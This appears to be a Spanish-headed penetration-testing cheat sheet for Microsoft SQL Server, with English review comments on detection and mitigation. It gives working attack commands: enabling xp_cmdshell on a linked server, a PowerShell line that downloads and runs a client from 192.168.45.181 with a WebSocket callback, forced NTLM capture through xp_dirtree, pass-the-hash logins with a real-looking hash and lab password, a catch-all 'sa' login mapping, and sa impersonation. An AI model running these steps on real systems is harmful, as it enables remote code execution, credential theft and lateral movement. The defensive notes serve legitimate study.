Enumeración
-- Enumerate linked servers. Both calls list the servers this instance can reach
-- through four-part names / EXEC ... AT; sys.servers additionally includes the
-- local instance itself.
-- NOTE(review): defenders should reconcile this output against an inventory of
-- approved links — every row is a lateral path whose blast radius is decided by
-- the remote-login mapping (see the sp_addlinkedsrvlogin example further down).
EXEC sp_linkedservers;
SELECT * FROM sys.servers;
Linked Server → RCE
-- EXEC (...) AT [SQL53] runs the string on the *remote* linked server, so these
-- sp_configure changes enable xp_cmdshell on SQL53, not locally. They succeed
-- only if the login mapped for this link holds ALTER SETTINGS (e.g. sysadmin)
-- on SQL53.
EXEC ('sp_configure ''show advanced options'',1;RECONFIGURE;') AT [SQL53];
-- NOTE(review): every sp_configure change is written to the target's SQL Server
-- error log ("Configuration option 'xp_cmdshell' changed from 0 to 1 ..."), so
-- alerting on that message is the cheapest detection for this step; keeping
-- xp_cmdshell disabled and the link's remote login non-sysadmin prevents it.
EXEC ('sp_configure ''xp_cmdshell'',1;RECONFIGURE;') AT [SQL53];
-- Executes an OS command on SQL53 through the four-part name. The command runs
-- under SQL53's service account (or its xp_cmdshell proxy account); outbound
-- HTTP/WebSocket connections originating from a database host's service account
-- are themselves a strong network-level indicator worth alerting on.
EXEC [SQL53].master..xp_cmdshell '
powershell -c "iwr <http://192.168.45.181/client.exe> -o C:\\Users\\Public\\client.exe;
C:\\Users\\Public\\client.exe --url ws://192.168.45.181:8000/ws"
';
Captura NTLM
EXEC master.sys.xp_dirtree '\\\\192.168.45.181\\l';
Acceso interactivo
# Interactive MSSQL sessions with Impacket and mssqlpwner.
# NOTE(review): "[email protected]" on the next line is an extraction artifact
# (e-mail-address obfuscation by the hosting site); the original credential and
# target host of this command cannot be recovered from this page.
impacket-mssqlclient webapp11:[email protected] -db music
# Windows authentication as a computer account (web01$) using its NTLM hash
# (the empty LM half precedes the colon) instead of a password.
# NOTE(review): a computer account logging on to MSSQL over NTLM from an unexpected
# source host is a useful detection; requiring Kerberos / restricting NTLM for the
# SQL service and resetting the computer-account password are the matching mitigations.
mssqlpwner -hashes ':73a34bad3e589783936fcd0a407dcf39' cowmotors-int.com/'web01$'@172.16.111.223 -windows-auth interactive
# Same tool with a domain service account and a cleartext password.
mssqlpwner 'signed.htb/mssqlsvc:purPLE9795!@'@10.10.11.90 -windows-auth interactive
Linked Server con credenciales
-- Maps local logins to a fixed remote login on linked server SQL03. With
-- @useself='false' and @locallogin=NULL the mapping applies to *every* local
-- login, so any caller allowed to use the link becomes 'sa' on SQL03.
-- 'TuContraseña' is a placeholder ("YourPassword" in Spanish) for the remote
-- login's password.
-- NOTE(review): this needs ALTER ANY LOGIN locally. Defenders should audit
-- sys.linked_logins for catch-all rows (local_principal_id = 0) with
-- uses_self_credential = 0 that point at high-privilege remote logins, and
-- replace them with per-login mappings to a least-privilege remote account.
EXEC sp_addlinkedsrvlogin
@rmtsrvname='SQL03',
@useself='false',
@locallogin=NULL,
@rmtuser='sa',
@rmtpassword='TuContraseña';
Impersonar SA
EXECUTE AS LOGIN = 'sa';